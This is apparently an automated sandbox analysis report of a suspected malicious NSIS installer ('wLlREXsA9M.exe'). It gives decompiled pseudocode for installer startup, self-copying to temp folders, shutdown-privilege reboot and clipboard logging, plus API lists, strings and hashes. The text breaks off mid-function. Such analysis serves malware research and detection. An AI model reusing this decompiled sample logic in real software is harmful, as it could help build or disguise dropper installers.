								__eflags =  *_t54 - ((( *0x409183 << 0x00000008 |  *0x409182) << 0x00000008 |  *0x409181) << 0x00000008 | "NCRC");
								if( *_t54 != ((( *0x409183 << 0x00000008 |  *0x409182) << 0x00000008 |  *0x409181) << 0x00000008 | "NCRC")) {
									L21:
									__eflags =  *((intOrPtr*)(_t54 - 2)) - ((( *0x40917b << 0x00000008 |  *0x40917a) << 0x00000008 |  *0x409179) << 0x00000008 | " /D=");
									if( *((intOrPtr*)(_t54 - 2)) == ((( *0x40917b << 0x00000008 |  *0x40917a) << 0x00000008 |  *0x409179) << 0x00000008 | " /D=")) {
										 *((char*)(_t54 - 2)) = 0;
										__eflags =  &(_t54[2]);
										E00405D8D("C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Strygende\\ridered\\Aftest",  &(_t54[2]));
										L27:
										_t156 = "C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
										GetTempPathA(0x400, _t156); // executed
										_t58 = E0040313C(_t168);
										_t169 = _t58;
										if(_t58 != 0) {
											L30:
											DeleteFileA("1033"); // executed
											_t60 = E00402CFA(_t171,  *(_t163 + 0x20)); // executed
											 *((intOrPtr*)(_t163 + 0x10)) = _t60;
											if(_t60 != 0) {
												L40:
												E00403633();
												__imp__OleUninitialize();
												_t181 =  *((intOrPtr*)(_t163 + 0x10));
												if( *((intOrPtr*)(_t163 + 0x10)) == 0) {
													__eflags =  *0x423794;
													if( *0x423794 == 0) {
														L64:
														_t62 =  *0x4237ac;
														__eflags = _t62 - 0xffffffff;
														if(_t62 != 0xffffffff) {
															 *(_t163 + 0x14) = _t62;
														}
														ExitProcess( *(_t163 + 0x14));
													}
													_t65 = OpenProcessToken(GetCurrentProcess(), "true", _t163 + 0x18);
													__eflags = _t65;
													_t149 = 2;
													if(_t65 != 0) {
														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t163 + 0x24);
														 *(_t163 + 0x38) = 1;
														 *(_t163 + 0x44) = _t149;
														AdjustTokenPrivileges( *(_t163 + 0x2c), 0, _t163 + 0x28, 0, 0, 0);
													}
													_t66 = E00406126("true");
													__eflags = _t66;
													if(_t66 == 0) {
														L62:
														_t67 = ExitWindowsEx(_t149, 0x80040002);
														__eflags = _t67;
														if(_t67 != 0) {
															goto L64;
														}
														goto L63;
													} else {
														_t69 =  *_t66(0, 0, 0, 0x25, 0x80040002);
														__eflags = _t69;
														if(_t69 == 0) {
															L63:
															E0040140B(9);
															goto L64;
														}
														goto L62;
													}
												}
												E00405583( *((intOrPtr*)(_t163 + 0x10)), 0x200010);
												ExitProcess(2);
											}
											if( *0x42371c == 0) {
												L39:
												 *0x4237ac =  *0x4237ac | 0xffffffff;
												 *(_t163 + 0x18) = E0040370D( *0x4237ac);
												goto L40;
											}
											_t152 = E0040582A(_t159, 0);
											if(_t152 < _t159) {
												L36:
												_t178 = _t152 - _t159;
												 *((intOrPtr*)(_t163 + 0x10)) = "Error launching installer";
												if(_t152 < _t159) {
													_t150 = E00405506(_t181);
													lstrcatA(_t156, "~nsu");
													if(_t150 != 0) {
														lstrcatA(_t156, "A");
													}
													lstrcatA(_t156, ".tmp");
													_t161 = "C:\\Users\\Arthur\\Desktop";
													if(lstrcmpiA(_t156, "C:\\Users\\Arthur\\Desktop") != 0) {
														_push(_t156);
														if(_t150 == 0) {
															E004054E9();
														} else {
															E0040546C();
														}
														SetCurrentDirectoryA(_t156);
														_t185 = "C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Strygende\\ridered\\Aftest"; // 0x43
														if(_t185 == 0) {
															E00405D8D("C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Strygende\\ridered\\Aftest", _t161);
														}
														E00405D8D(0x424000,  *(_t163 + 0x1c));
														_t136 = "A";
														_t162 = 0x1a;
														 *0x424400 = "A";
														do {
															E00405DAF(0, 0x41e8c8, _t156, 0x41e8c8,  *((intOrPtr*)( *0x423710 + 0x120)));
															DeleteFileA(0x41e8c8);
															if( *((intOrPtr*)(_t163 + 0x10)) != 0 && CopyFileA("C:\\Users\\Arthur\\Desktop\\wLlREXsA9M.exe", 0x41e8c8, 1) != 0) {
																E00405C48(_t136, 0x41e8c8, 0);
																E00405DAF(0, 0x41e8c8, _t156, 0x41e8c8,  *((intOrPtr*)( *0x423710 + 0x124)));
																_t93 = E0040551E(0x41e8c8);
																if(_t93 != 0) {
																	CloseHandle(_t93);
																	 *((intOrPtr*)(_t163 + 0x10)) = 0;
																}
															}
															 *0x424400 =  *0x424400 + 1;
															_t162 = _t162 - 1;
														} while (_t162 != 0);
														E00405C48(_t136, _t156, 0);
													}
													goto L40;
												}
												 *_t152 = 0;
												_t153 = _t152 + 4;
												if(E004058ED(_t178, _t152 + 4) == 0) {
													goto L40;
												}
												E00405D8D("C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Strygende\\ridered\\Aftest", _t153);
												E00405D8D("C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Strygende\\ridered\\Aftest\\Narkocentret", _t153);
												 *((intOrPtr*)(_t163 + 0x10)) = 0;
												goto L39;
											}
											_t109 = (( *0x40915b << 0x00000008 |  *0x40915a) << 0x00000008 |  *0x409159) << 0x00000008 | " _?=";
											while( *_t152 != _t109) {
												_t152 = _t152 - 1;
												if(_t152 >= _t159) {
													continue;
												}
												goto L36;
											}
											goto L36;
										}
										GetWindowsDirectoryA(_t156, 0x3fb);
										lstrcatA(_t156, "\\Temp");
										_t112 = E0040313C(_t169);
										_t170 = _t112;
										if(_t112 != 0) {
											goto L30;
										}
										GetTempPathA(0x3fc, _t156);
										lstrcatA(_t156, "Low");
										SetEnvironmentVariableA("TEMP", _t156);
										SetEnvironmentVariableA("TMP", _t156);
										_t117 = E0040313C(_t170);
										_t171 = _t117;
										if(_t117 == 0) {
											goto L40;
										}
										goto L30;
									}
									goto L22;
								}
								_t140 = _t54[4];
								__eflags = _t140 - 0x20;
								if(_t140 == 0x20) {
									L20:
									_t15 = _t163 + 0x20;
									 *_t15 =  *(_t163 + 0x20) | 0x00000004;
									__eflags =  *_t15;
									goto L21;
								}
								__eflags = _t140;
								if(_t140 != 0) {
									goto L21;
								}
								goto L20;
							}
							_t141 = _t54[1];
							__eflags = _t141 - 0x20;
							if(_t141 == 0x20) {
								L16:
								 *0x4237a0 = 1;
								goto L17;
							}
							__eflags = _t141;
							if(_t141 != 0) {
								goto L17;
							}
							goto L16;
						}
					} else {
						goto L9;
					}
					do {
						L9:
						_t54 =  &(_t54[1]);
						__eflags =  *_t54 - 0x20;
					} while ( *_t54 == 0x20);
					goto L10;
				}
				goto L27;
			}

0x0040317d
0x00403181
0x00403189
0x0040318d
0x00403192
0x004031a2
0x004031a5
0x004031ac
0x004031b3
0x004031b3
0x004031ac
0x004031b5
0x004031ba
0x004031bb
0x004031c7
0x004031cb
0x004031d2
0x004031d9
0x004031de
0x004031e3
0x004031ea
0x004031f0
0x00403206
0x00403216
0x0040321b
0x00403221
0x00403228
0x0040323b
0x00403240
0x00403242
0x00403244
0x00403249
0x00403249
0x00403259
0x0040325f
0x00403328
0x00403328
0x0040332a
0x0040332c
0x00000000
0x00000000
0x00403268
0x0040326b
0x00403273
0x00403273
0x00403276
0x0040327b
0x0040327d
0x0040327d
0x0040327e
0x0040327e
0x00403283
0x00403286
0x00403318
0x0040331d
0x00403322
0x00403325
0x00403327
0x00403327
0x00403327
0x00000000
0x0040328c
0x0040328c
0x0040328d
0x00403290
0x004032a8
0x004032d3
0x004032d5
0x004032e8
0x00403313
0x00403316
0x00403334
0x00403337
0x00403340
0x00403345
0x0040334b
0x00403356
0x00403358
0x0040335d
0x0040335f
0x004033b7
0x004033bc
0x004033c6
0x004033cd
0x004033d1
0x00403465
0x00403465
0x0040346a
0x00403470
0x00403475
0x00403599
0x0040359f
0x0040361b
0x0040361b
0x00403620
0x00403623
0x00403625
0x00403625
0x0040362d
0x0040362d
0x004035af
0x004035b7
0x004035b9
0x004035ba
0x004035c7
0x004035da
0x004035e2
0x004035e6
0x004035e6
0x004035ee
0x004035f3
0x004035fa
0x00403608
0x0040360a
0x00403610
0x00403612
0x00000000
0x00000000
0x00000000
0x004035fc
0x00403602
0x00403604
0x00403606
0x00403614
0x00403616
0x00000000
0x00403616
0x00000000
0x00403606
0x004035fa
0x00403484
0x0040348b
0x0040348b
0x004033dd
0x00403455
0x00403455
0x00403461
0x00000000
0x00403461
0x004033e6
0x004033ea
0x00403420
0x00403420
0x00403422
0x0040342a
0x0040349c
0x0040349e
0x004034a5
0x004034ad
0x004034ad
0x004034b8
0x004034bd
0x004034cc
0x004034d0
0x004034d1
0x004034da
0x004034d3
0x004034d3
0x004034d3
0x004034e0
0x004034e6
0x004034ec
0x004034f4
0x004034f4
0x00403502
0x00403507
0x00403519
0x00403521
0x00403527
0x00403533
0x00403539
0x00403543
0x00403559
0x0040356a
0x00403570
0x00403577
0x0040357a
0x00403580
0x00403580
0x00403577
0x00403584
0x0040358a
0x0040358a
0x0040358f
0x0040358f
0x00000000
0x004034cc
0x0040342c
0x0040342e
0x00403439
0x00000000
0x00000000
0x00403441
0x0040344c
0x00403451
0x00000000
0x00403451
0x00403415
0x00403417
0x0040341b
0x0040341e
0x00000000
0x00000000
0x00000000
0x0040341e
0x00000000
0x00403417
0x00403367
0x00403373
0x00403378
0x0040337d
0x0040337f
0x00000000
0x00000000
0x00403387
0x0040338f
0x004033a0
0x004033a8
0x004033aa
0x004033af
0x004033b1
0x00000000
0x00000000
0x00000000
0x004033b1
0x00000000
0x00403316
0x004032d7
0x004032da
0x004032dd
0x004032e3
0x004032e3
0x004032e3
0x004032e3
0x00000000
0x004032e3
0x004032df
0x004032e1
0x00000000
0x00000000
0x00000000
0x004032e1
0x00403292
0x00403295
0x00403298
0x0040329e
0x0040329e
0x00000000
0x0040329e
0x0040329a
0x0040329c
0x00000000
0x00000000
0x00000000
0x0040329c
0x00000000
0x00000000
0x00000000
0x0040326d
0x0040326d
0x0040326d
0x0040326e
0x0040326e
0x00000000
0x0040326d
0x00000000

APIs

SetErrorMode.KERNELBASE ref: 00403192
GetVersion.KERNEL32 ref: 00403198
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004031C1
#17.COMCTL32(00000007,00000009), ref: 004031E3
OleInitialize.OLE32(00000000), ref: 004031EA
SHGetFileInfoA.SHELL32(0041ECC8,00000000,?,?,00000000), ref: 00403206
GetCommandLineA.KERNEL32(00422F00,NSIS Error), ref: 0040321B
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\wLlREXsA9M.exe",00000000), ref: 0040322E
CharNextA.USER32(00000000,"C:\Users\user\Desktop\wLlREXsA9M.exe",00000020), ref: 00403259
GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403356
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403367
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403373
GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403387
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040338F
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004033A0
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004033A8
DeleteFileA.KERNELBASE(1033), ref: 004033BC

Part of subcall function 00406126: GetModuleHandleA.KERNEL32(?,?,?,004031D7,00000009), ref: 00406138
Part of subcall function 00406126: GetProcAddress.KERNEL32(00000000,?), ref: 00406153

OleUninitialize.OLE32(?), ref: 0040346A
ExitProcess.KERNEL32 ref: 0040348B
GetCurrentProcess.KERNEL32(?,?), ref: 004035A8
OpenProcessToken.ADVAPI32(00000000), ref: 004035AF
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004035C7
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004035E6
ExitWindowsEx.USER32(00000002,80040002), ref: 0040360A
ExitProcess.KERNEL32 ref: 0040362D

Part of subcall function 00405583: MessageBoxIndirectA.USER32(00409218), ref: 004055DE

Strings

~nsu, xrefs: 00403496
TEMP, xrefs: 0040339B
Low, xrefs: 00403389
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Strygende\ridered\Aftest\Narkocentret, xrefs: 00403447
NSIS Error, xrefs: 0040320C
C:\Users\user\Desktop\wLlREXsA9M.exe, xrefs: 00403548
", xrefs: 0040327E
"C:\Users\user\Desktop\wLlREXsA9M.exe", xrefs: 00403221, 00403227, 004033E0
TMP, xrefs: 004033A3
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Strygende\ridered\Aftest, xrefs: 0040333B, 0040343C, 004034E6, 004034EF
UXTHEME, xrefs: 004031B5, 004031BA, 004031C0
SeShutdownPrivilege, xrefs: 004035C1
.tmp, xrefs: 004034B2
Error launching installer, xrefs: 00403422
C:\Users\user\Desktop, xrefs: 004034BD, 004034C2, 004034EE
C:\Users\user\AppData\Local\Temp\, xrefs: 0040334B, 00403350, 00403366, 00403372, 00403381, 0040338E, 0040339A, 004033A2, 0040349B, 004034AC, 004034B7, 004034C3, 004034D0, 004034DF, 0040358E
\Temp, xrefs: 0040336D
1033, xrefs: 004033B7

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
String ID: "$"C:\Users\user\Desktop\wLlREXsA9M.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Strygende\ridered\Aftest$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Strygende\ridered\Aftest\Narkocentret$C:\Users\user\Desktop$C:\Users\user\Desktop\wLlREXsA9M.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3329125770-724182652
Opcode ID: bf3fc90037a8a14814135a0077de16f20a2156f6cefbbd91e08a0be90b043a45
Instruction ID: a24de05d46868432ea9b5a47f38bd3c7d8c59146dd147342f8fbc5c251b01ed8
Opcode Fuzzy Hash: bf3fc90037a8a14814135a0077de16f20a2156f6cefbbd91e08a0be90b043a45
Instruction Fuzzy Hash: 9EC1E4706082427AE7216F619D4DA2B3EA9EF86306F04457FF541B61E2C77C8E058B6E

Uniqueness

Uniqueness Score: -1.00%

Function 004050E4 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E004050E4(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				int _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t87;
				struct HWND__* _t89;
				long _t90;
				int _t95;
				int _t96;
				long _t99;
				void* _t102;
				intOrPtr _t113;
				void* _t121;
				intOrPtr _t124;
				struct HWND__* _t128;
				int _t150;
				int _t153;
				long _t157;
				struct HWND__* _t161;
				struct HMENU__* _t163;
				long _t165;
				void* _t166;
				char* _t167;
				char* _t168;
				int _t169;

				_t87 =  *0x422ee4; // 0x10434
				_t157 = _a8;
				_t150 = 0;
				_v8 = _t87;
				if(_t157 != 0x110) {
					__eflags = _t157 - 0x405;
					if(_t157 == 0x405) {
						_t121 = CreateThread(0, 0, E00405078, GetDlgItem(_a4, 0x3ec), 0,  &_a8); // executed
						CloseHandle(_t121);
					}
					__eflags = _t157 - 0x111;
					if(_t157 != 0x111) {
						L17:
						__eflags = _t157 - 0x404;
						if(_t157 != 0x404) {
							L25:
							__eflags = _t157 - 0x7b;
							if(_t157 != 0x7b) {
								goto L20;
							}
							_t89 = _v8;
							__eflags = _a12 - _t89;
							if(_a12 != _t89) {
								goto L20;
							}
							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
							__eflags = _t90 - _t150;
							_a12 = _t90;
							if(_t90 <= _t150) {
								L36:
								return 0;
							}
							_t163 = CreatePopupMenu();
							AppendMenuA(_t163, _t150, 1, E00405DAF(_t150, _t157, _t163, _t150, 0xffffffe1));
							_t95 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t153 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v24);
								_t95 = _v24.left;
								_t153 = _v24.top;
							}
							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
							__eflags = _t96 - 1;
							if(_t96 == 1) {
								_t165 = 1;
								__eflags = 1;
								_v56 = _t150;
								_v44 = 0x41fd08;
								_v40 = 0x1000;
								_a4 = _a12;
								do {
									_a4 = _a4 - 1;
									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
									__eflags = _a4 - _t150;
									_t165 = _t165 + _t99 + 2;
								} while (_a4 != _t150);
								OpenClipboard(_t150);
								EmptyClipboard();
								_t102 = GlobalAlloc(0x42, _t165);
								_a4 = _t102;
								_t166 = GlobalLock(_t102);
								do {
									_v44 = _t166;
									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
									 *_t167 = 0xd;
									_t168 = _t167 + 1;
									 *_t168 = 0xa;
									_t166 = _t168 + 1;
									_t150 = _t150 + 1;
									__eflags = _t150 - _a12;
								} while (_t150 < _a12);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x422ecc - _t150; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x423708, "true");
							__eflags =  *0x42378c - _t150;
							if( *0x42378c == _t150) {
								_t113 =  *0x41f4e0; // 0x7746fc
								E00404FA6( *((intOrPtr*)(_t113 + 0x34)), _t150);
							}
							E00403F4B(1);
							goto L25;
						}
						 *0x41f0d8 = 2;
						E00403F4B("true");
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00403FD9(_t157, _a12, _a16);
						}
						ShowWindow( *0x422ed0, _t150);
						ShowWindow(_v8, "true");
						E00403FA7(_v8);
						goto L17;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_t169 = 2;
				_v56 = _t169;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t124 =  *0x423710;
				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
				_a8 =  *((intOrPtr*)(_t124 + 0x60));
				 *0x422ed0 = GetDlgItem(_a4, 0x403);
				 *0x422ec8 = GetDlgItem(_a4, 0x3ee);
				_t128 = GetDlgItem(_a4, 0x3f8);
				 *0x422ee4 = _t128;
				_v8 = _t128;
				E00403FA7( *0x422ed0);
				 *0x422ed4 = E00404844("true");
				 *0x422eec = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(_t169);
				SendMessageA(_v8, 0x101b, 0,  &_v56); // executed
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a12 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a12);
					SendMessageA(_v8, 0x1026, 0, _a12);
				}
				if(_a8 >= _t150) {
					SendMessageA(_v8, 0x1024, _t150, _a8);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403F72(_a4);
				if(( *0x423718 & 0x00000003) != 0) {
					ShowWindow( *0x422ed0, _t150);
					if(( *0x423718 & 0x00000002) != 0) {
						 *0x422ed0 = _t150;
					} else {
						ShowWindow(_v8, "true");
					}
					E00403FA7( *0x422ec8);
				}
				_t161 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t161, 0x401, _t150, 0x75300000);
				if(( *0x423718 & 0x00000004) != 0) {
					SendMessageA(_t161, 0x409, _t150, _a8);
					SendMessageA(_t161, 0x2001, _t150, _a12);
				}
				goto L36;
			}

0x004050ea
0x004050f2
0x004050f5
0x004050fd
0x00405100
0x0040528f
0x00405295
0x004052b2
0x004052b9
0x004052b9
0x004052c5
0x004052cb
0x004052ed
0x004052ed
0x004052f3
0x00405348
0x00405348
0x0040534b
0x00000000
0x00000000
0x0040534d
0x00405350
0x00405353
0x00000000
0x00000000
0x0040535d
0x00405363
0x00405365
0x00405368
0x00405465
0x00000000
0x00405465
0x00405377
0x00405383
0x0040538c
0x00405393
0x00405397
0x0040539a
0x004053a3
0x004053a9
0x004053ac
0x004053ac
0x004053bc
0x004053c2
0x004053c5
0x004053d0
0x004053d0
0x004053d1
0x004053d4
0x004053db
0x004053e2
0x004053ea
0x004053ea
0x004053f8
0x004053fe
0x00405401
0x00405401
0x00405408
0x0040540e
0x00405417
0x0040541e
0x00405427
0x00405429
0x0040542c
0x0040543b
0x0040543d
0x00405440
0x00405441
0x00405444
0x00405445
0x00405446
0x00405446
0x0040544e
0x00405459
0x0040545f
0x0040545f
0x00000000
0x004053c5
0x004052f5
0x004052fb
0x00405329
0x0040532b
0x00405331
0x00405333
0x0040533c
0x0040533c
0x00405343
0x00000000
0x00405343
0x004052ff
0x00405309
0x00000000
0x004052cd
0x004052cd
0x004052d3
0x0040530e
0x00000000
0x00405315
0x004052dc
0x004052e3
0x004052e8
0x00000000
0x004052e8
0x004052cb
0x00405106
0x0040510a
0x00405112
0x00405116
0x00405119
0x0040511c
0x0040511f
0x00405122
0x00405123
0x00405124
0x0040513d
0x00405140
0x0040514a
0x00405159
0x00405161
0x00405169
0x0040516e
0x00405171
0x0040517d
0x00405186
0x0040518f
0x004051b1
0x004051b7
0x004051c8
0x004051cd
0x004051db
0x004051e9
0x004051e9
0x004051ee
0x004051fc
0x004051fc
0x00405201
0x00405204
0x00405209
0x00405215
0x0040521e
0x0040522b
0x0040523a
0x0040522d
0x00405232
0x00405232
0x00405246
0x00405246
0x0040525a
0x00405263
0x0040526c
0x0040527c
0x00405288
0x00405288
0x00000000

APIs

GetDlgItem.USER32(?,00000403), ref: 00405143
GetDlgItem.USER32(?,000003EE), ref: 00405152
GetClientRect.USER32(?,?), ref: 0040518F
GetSystemMetrics.USER32(00000002), ref: 00405196
SendMessageA.USER32(?,0000101B,00000000,?), ref: 004051B7
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004051C8
SendMessageA.USER32(?,00001001,00000000,?), ref: 004051DB
SendMessageA.USER32(?,00001026,00000000,?), ref: 004051E9
SendMessageA.USER32(?,00001024,00000000,?), ref: 004051FC
ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040521E
ShowWindow.USER32(?,?), ref: 00405232
GetDlgItem.USER32(?,000003EC), ref: 00405253
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405263
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040527C
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405288
GetDlgItem.USER32(?,000003F8), ref: 00405161

Part of subcall function 00403FA7: SendMessageA.USER32(?,?,00000001,00403DD8), ref: 00403FB5

GetDlgItem.USER32(?,000003EC), ref: 004052A4
CreateThread.KERNEL32(00000000,00000000,Function_00005078,00000000), ref: 004052B2
CloseHandle.KERNELBASE(00000000), ref: 004052B9
ShowWindow.USER32(00000000), ref: 004052DC
ShowWindow.USER32(?,?), ref: 004052E3
ShowWindow.USER32(?), ref: 00405329
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040535D
CreatePopupMenu.USER32 ref: 0040536E
AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405383
GetWindowRect.USER32(?,000000FF), ref: 004053A3
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053BC
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004053F8
OpenClipboard.USER32(00000000), ref: 00405408
EmptyClipboard.USER32 ref: 0040540E
GlobalAlloc.KERNEL32(00000042,?), ref: 00405417
GlobalLock.KERNEL32(00000000), ref: 00405421
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405435
GlobalUnlock.KERNEL32(00000000), ref: 0040544E
SetClipboardData.USER32(00000001,00000000), ref: 00405459
CloseClipboard.USER32 ref: 0040545F

Strings

Exarchy Setup: Installing, xrefs: 004053D4

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: Exarchy Setup: Installing
API String ID: 590372296-1182559719
Opcode ID: 8a7509dfebef5e938c3256e28d01cd09f86db8704786013b949aa8ed737145f2
Instruction ID: ce82b00883d7a9a68bbbf4289902977b8137e468e5f39093ec4173815583daa3
Opcode Fuzzy Hash: 8a7509dfebef5e938c3256e28d01cd09f86db8704786013b949aa8ed737145f2
Instruction Fuzzy Hash: 7CA138B1900209BFDB119FA0DE89AAE7F79FB08355F00407AFA01B61A0C7B55E519F69

Uniqueness

Uniqueness Score: -1.00%

Function 10001A5D Relevance: 20.0, APIs: 13, Instructions: 540
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E10001A5D() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				CHAR* _v24;
				CHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				CHAR* _v44;
				signed int _v48;
				void* _v52;
				intOrPtr _v56;
				CHAR* _t198;
				signed int _t201;
				void* _t203;
				void* _t205;
				CHAR* _t207;
				void* _t215;
				struct HINSTANCE__* _t216;
				struct HINSTANCE__* _t217;
				struct HINSTANCE__* _t219;
				signed short _t221;
				struct HINSTANCE__* _t224;
				struct HINSTANCE__* _t226;
				void* _t227;
				char* _t228;
				void* _t239;
				signed char _t240;
				signed int _t241;
				void* _t245;
				struct HINSTANCE__* _t247;
				void* _t248;
				signed int _t250;
				signed int _t252;
				signed int _t258;
				void* _t259;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t271;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				void* _t277;
				void* _t281;
				struct HINSTANCE__* _t283;
				signed char _t286;
				void _t287;
				signed int _t288;
				signed int _t300;
				signed int _t301;
				signed char _t307;
				signed int _t308;
				CHAR* _t309;
				CHAR* _t311;
				CHAR* _t312;
				struct HINSTANCE__* _t313;
				void* _t315;
				signed int _t316;
				void* _t317;

				_t283 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t317 = 0;
				_v48 = 0;
				_t198 = E10001215();
				_v24 = _t198;
				_v28 = _t198;
				_v44 = E10001215();
				_t308 = E1000123B();
				_v52 = _t308;
				_v12 = _t308;
				while(1) {
					_t201 = _v32;
					_v56 = _t201;
					if(_t201 != _t283 && _t317 == _t283) {
						break;
					}
					_t307 =  *_t308;
					_t286 = _t307;
					_t203 = _t286 - _t283;
					if(_t203 == 0) {
						_t33 =  &_v32;
						 *_t33 = _v32 | 0xffffffff;
						__eflags =  *_t33;
						L17:
						_t205 = _v56 - _t283;
						if(_t205 == 0) {
							 *_v28 =  *_v28 & 0x00000000;
							__eflags = _t317 - _t283;
							if(_t317 == _t283) {
								_t245 = GlobalAlloc("true", 0x14a4); // executed
